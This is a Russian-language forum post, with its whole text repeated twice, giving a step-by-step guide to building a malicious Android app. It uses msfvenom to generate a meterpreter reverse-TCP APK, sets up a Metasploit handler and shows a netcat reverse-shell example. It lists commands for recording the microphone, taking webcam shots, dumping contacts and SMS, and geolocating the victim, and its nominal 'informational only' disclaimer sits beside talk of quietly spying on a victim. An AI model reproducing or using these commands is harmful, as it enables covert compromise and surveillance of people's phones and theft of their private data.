Hyper.png
New member
Только для ознакомительных целях, дабы бы не попались на это!
Принцип работы
Простыми словами, сначала создадем приложение(payload), в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.
Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:
nc -l -p 8577
Жертва в свою очередь подключается к этому открытому порту:
nc 192.168.1.1 8577 -e /bin/bash
Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.
Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.
Создание payload
Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:
msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R shell.apk
После выполнения команды в корневой директории будет создан файл shell.apk.
Далее необходимо запустить msfconsole.
msfconsole
После этого последовательно выполняем все команды:
use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST ВашIPset LPORT 4444exploit
После этого, человек должен запусить shell.apk.
Некоторые полезные команды:
record_micwebcam_snapwebcam_streamdump_contactsdump_smsgeolocate
После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.
Принцип работы
Простыми словами, сначала создадем приложение(payload), в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.
Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:
nc -l -p 8577
Жертва в свою очередь подключается к этому открытому порту:
nc 192.168.1.1 8577 -e /bin/bash
Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.
Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.
Создание payload
Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:
msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R shell.apk
После выполнения команды в корневой директории будет создан файл shell.apk.
Далее необходимо запустить msfconsole.
msfconsole
После этого последовательно выполняем все команды:
use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST ВашIPset LPORT 4444exploit
После этого, человек должен запусить shell.apk.
Некоторые полезные команды:
record_micwebcam_snapwebcam_streamdump_contactsdump_smsgeolocate
После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.